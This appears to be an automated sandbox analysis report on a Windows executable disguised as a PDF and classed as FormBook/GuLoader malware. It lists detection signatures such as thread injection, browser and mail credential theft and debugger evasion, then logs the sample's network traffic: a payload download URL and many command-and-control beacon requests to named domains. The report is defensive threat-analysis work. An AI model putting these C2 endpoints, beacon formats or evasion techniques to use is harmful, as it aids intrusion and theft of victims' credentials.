Windows Analysis Report
BM-FM_NR.24040718PDF.exe

Overview

General Information

Sample name: BM-FM_NR.24040718PDF.exe
Analysis ID: 1430949
MD5: 7206084219e20fe7575aec63a3422a5c
SHA1: 930508090c6ec226838189c1d6ca32035c2ac0ed
SHA256: 3fb935f3b274dddf25a926967ceb573ad0f990bff966583157849545c60c42e4

Detection

FormBook, GuLoader
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection

Source: BM-FM_NR.24040718PDF.exe Virustotal: Detection: 12%
Source: Yara match File source: 00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.17952328354.0000000000690000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.13649482189.0000000036790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.17955935422.0000000004FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.17956116305.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.17954988019.0000000003120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.13650313872.0000000036E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: BM-FM_NR.24040718PDF.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 37.251.143.215:443 -> 192.168.11.20:50244 version: TLS 1.2
Source: BM-FM_NR.24040718PDF.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: write.pdbGCTL source: BM-FM_NR.24040718PDF.exe, 00000002.00000002.13639421205.0000000006905000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: write.pdb source: BM-FM_NR.24040718PDF.exe, 00000002.00000002.13639421205.0000000006905000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mshtml.pdb source: BM-FM_NR.24040718PDF.exe, 00000002.00000001.13262071242.0000000000649000.00000020.00000001.01000000.00000006.sdmp
Source: Binary string: wntdll.pdbUGP source: BM-FM_NR.24040718PDF.exe, 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: BM-FM_NR.24040718PDF.exe, BM-FM_NR.24040718PDF.exe, 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, write.exe
Source: Binary string: mshtml.pdbUGP source: BM-FM_NR.24040718PDF.exe, 00000002.00000001.13262071242.0000000000649000.00000020.00000001.01000000.00000006.sdmp
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 0_2_00406033 FindFirstFileA,FindClose, 0_2_00406033
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 0_2_004055D1 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 0_2_004055D1
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 0_2_00402688 FindFirstFileA, 0_2_00402688
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_02FDB810 FindFirstFileW,FindNextFileW,FindClose, 5_2_02FDB810
Source: C:\Windows\SysWOW64\write.exe Code function: 4x nop then xor eax, eax 5_2_02FC92D0
Source: Joe Sandbox View IP Address: 84.32.84.32 84.32.84.32
Source: Joe Sandbox View IP Address: 64.190.62.22 64.190.62.22
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /calitateX/lUMnxNJflRDqoVSbz65.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: absorbante-calitate.roCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8cgp/?QDnH=ERXP8&Xh9lX=Rt3kyQgIVYud0ZxfjVmkNGlq6oguJ3Bu0zZO/jPZwrZwphqha226ELu53C2wC06UMZB3RXlB5IubdFV8wNllBFtqfqdEgmnsNC5NpQzeW4FZZkQ+d4TAHSc= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.arilyfarlico.ruUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Source: global traffic HTTP traffic detected: GET /8cgp/?Xh9lX=0rOrON9KCedqtp/KEErYODOsqb1Ol5SKTVjby8oNAnBpXQ3f6KiEeGIyIQ0Oonef/1tP4f58WruRrbReuj87L8qx+pUtt26y1FhkvVaaULxp4u5kv8q4N/k=&QDnH=ERXP8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.donantedeovulos.spaceUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Source: global traffic HTTP traffic detected: GET /8cgp/?QDnH=ERXP8&Xh9lX=TrWImKkXg72XbxtkItxdCHOg9XWXWDqE4iO1qHTBwn9T3tQecLtkumbZqYeYuSkxtGpQmOvVFI5PSbSpBsnHilSWnmtQ3orkxGs2pUIdqKkLQC6qurdmbFs= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.kader42.topUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Source: global traffic HTTP traffic detected: GET /8cgp/?Xh9lX=/YVHZOSW055QRFdzHV7EG4MPV06WciwOGAsmatOqDuiKItV6nqBs0pBRyzlLrNgNpWUhFR7Gbz8/7vzQvyrSOcbiMu9Z7oEFzfRxNbVqKIwXHjZvBpZwwR0=&QDnH=ERXP8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.noispisok.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Source: global traffic HTTP traffic detected: GET /8cgp/?QDnH=ERXP8&Xh9lX=IdWor3433k1T0EOhXt9dLiY9DbR+hWBcDBqvgnp+doAH8LsyGz9SvmmDD05EUVbRqIr7chpXUFkFyWAkdZSUbSWj4Fm/Hc2PGDqx2ZME3zVnMVls2zAW0u4= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.kansaiwoody.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Source: global traffic HTTP traffic detected: GET /8cgp/?Xh9lX=4GuIeZ5/FrknERHMXrNh6P2zNKgrxoOsX8fLf9+FvaUhJPhi6YvqajOryTNmV9FzTg+fg8zx27kOMjM9ARbv/mO9DinSc6hkOsxZ/ooW+MqGv6LVFVbELEQ=&QDnH=ERXP8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.a-two-spa-salon.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Source: global traffic HTTP traffic detected: GET /8cgp/?Xh9lX=983bcoiGgeytF04qoACGbDKY/XdXjFbfWR4mUmAai3szv0RRsFt8B5NwzCzTf8Kup64VkssKhH1SAFuTkhM3B+3j/r4OeS1gek1PDXkJF4iS0+BJcCSan5A=&QDnH=ERXP8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.techfun.infoUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Source: global traffic HTTP traffic detected: GET /8cgp/?QDnH=ERXP8&Xh9lX=OmGyc5P3HC4gilwd2aY8392rI7ekMFe8/FNw83qBYcD4CWN3uhWBPhzZSt3lBo5o5sC5ats8mUsRdTFftG6L4VjYphbRhm0WEo/D3mWtey64RraPnZAfyak= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.ogunlewefamily.org.ngUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Source: global traffic HTTP traffic detected: GET /8cgp/?Xh9lX=27hjRPCyRlHKx+9Yvp9X/66HqVrlT4yXNX1Fx10RnhcFdFyjtbgqtspXt/m7h19M1tNaQu/ADV6ErOuMACLC0xl2a7R1sTqGKQn1UwmaLCfsUIitr9DM5TM=&QDnH=ERXP8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.387mfyr.sbsUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Source: global traffic HTTP traffic detected: GET /8cgp/?QDnH=ERXP8&Xh9lX=gPmRQJtWqOniEM4QRYssNN1Z+6d7UeIsnmjN3YDy8B2ChygMtzhOiKO2U7rNAXgtrRM7pNM3lf9QxBLsAyZPQtIaU4REtcvgBDtZA8Dv/AhV5YtMj725a40= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.nurenose.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Source: global traffic HTTP traffic detected: GET /8cgp/?Xh9lX=PHd15HH4KfPc0usCsZkSxG972lDJtR4Pjc4etW3YVFy3SYU2ewDgVW1TagnS2dO7KixciWH8BWdXpsVg20loSBMgq1tvcXpNFyUGPl5UEoDw0JtEo5FA5Us=&QDnH=ERXP8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.lm2ue.usUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Source: global traffic HTTP traffic detected: GET /8cgp/?Xh9lX=1MJjEON/uhpbuDEqbkHBFEkwk/hMmapOQ6TXfH8Ig3o6kyo9vDLLjAAJ58FhZwMWBw3WEeqXS0siPV8x1sARUVUsjrzf4e0UfFtBtuYJdiL+lQFlVX0tNTo=&QDnH=ERXP8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.whjzff.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Source: global traffic HTTP traffic detected: GET /8cgp/?Xh9lX=fnwN1v/cGsL5Viy/xGPo7bu3BFyPSCGRcDxJWuOrmZaTk6+QfBJJ6K85NdT8x6wg+kdjGkUCY343uxqa5Yt4yEVQtg3mZjTzeLq2Z0Ov3khzfcaVVj80n48=&ad64=U4M8cbh8kd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.concretedailypress.netUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Source: global traffic HTTP traffic detected: GET /8cgp/?Xh9lX=27hjRPCyRlHKx+9Yvp9X/66HqVrlT4yXNX1Fx10RnhcFdFyjtbgqtspXt/m7h19M1tNaQu/ADV6ErOuMACLC0xl2a7R1sTqGKQn1UwmaLCfsUIitr9DM5TM=&ad64=U4M8cbh8kd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.387mfyr.sbsUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Source: asoFfnDVnWYESbbZcbazpTYkAQVO.exe, 00000006.00000002.17956910913.0000000002522000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: .www.linkedin.comTRUE/TRUE13336872580273675bscookie"v=1&202108181112191ce8ca8a-2c8f-4463-8512-6f2d1ae6da93AQFkN2vVMNQ3mpf7d5Ecg6Jz9iVIQMh2" equals www.linkedin.com (Linkedin)
Source: unknown DNS traffic detected: queries for: absorbante-calitate.ro
Source: unknown HTTP traffic detected: POST /8cgp/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brCache-Control: max-age=0Content-Length: 202Connection: closeContent-Type: application/x-www-form-urlencodedHost: www.donantedeovulos.spaceOrigin: http://www.donantedeovulos.spaceReferer: http://www.donantedeovulos.space/8cgp/User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 10:29:20 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzip
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 10:29:23 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzip
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 10:29:26 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzip
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 10:29:29 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 196Connection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 10:29:35 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeServer: ApacheX-Powered-By: PHP/8.2.18Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://a-two-spa-salon.com/wp-json/>; rel="https://api.w.org/"
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 10:29:38 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeServer: ApacheX-Powered-By: PHP/8.2.18Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://a-two-spa-salon.com/wp-json/>; rel="https://api.w.org/"
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 10:29:41 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeServer: ApacheX-Powered-By: PHP/8.2.18Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://a-two-spa-salon.com/wp-json/>; rel="https://api.w.org/"
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 10:29:57 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 10:30:00 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 10:30:03 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 10:30:05 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8 Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 10:30:11 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://ogunlewefamily.org.ng/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-Encoding,User-AgentContent-Encoding: gzipContent-Length: 7038Content-Type: text/html; charset=UTF-8
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 10:30:14 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://ogunlewefamily.org.ng/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-Encoding,User-AgentContent-Encoding: gzipContent-Length: 7038Content-Type: text/html; charset=UTF-8
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 10:30:17 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://ogunlewefamily.org.ng/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-Encoding,User-AgentContent-Encoding: gzipContent-Length: 7038Content-Type: text/html; charset=UTF-8
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 10:30:26 GMTContent-Type: text/htmlContent-Length: 146Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 10:30:28 GMTContent-Type: text/htmlContent-Length: 146Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 10:30:31 GMTContent-Type: text/htmlContent-Length: 146Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 10:30:34 GMTContent-Type: text/htmlContent-Length: 146Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 10:31:18 GMTContent-Type: text/htmlContent-Length: 162Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 10:31:21 GMTContent-Type: text/htmlContent-Length: 162Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 10:31:23 GMTContent-Type: text/htmlContent-Length: 162Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 10:31:26 GMTContent-Type: text/htmlContent-Length: 162Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 10:32:39 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzip
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 10:32:42 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzip
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 10:32:45 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzip
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 10:32:47 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 196Connection: close Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 10:32:53 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeServer: ApacheX-Powered-By: PHP/8.2.18Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://a-two-spa-salon.com/wp-json/>; rel="https://api.w.org/"
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 10:32:56 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeServer: ApacheX-Powered-By: PHP/8.2.18Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://a-two-spa-salon.com/wp-json/>; rel="https://api.w.org/"
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 10:32:59 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeServer: ApacheX-Powered-By: PHP/8.2.18Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://a-two-spa-salon.com/wp-json/>; rel="https://api.w.org/"
6c 6f 6e 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 20 26 72 61 71 75 6f 3b 20 e3 83 95 e3 82 a3 e3 83 bc e3 83 89 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 20 26 72 61 71 75 6f 3b 20 e3 82 b3 e3 83 a1 e3 83 b3 e3 83 88 e3 83 95 e3 82 a3 e3 83 bc e3 83 89 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 10:33:15 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
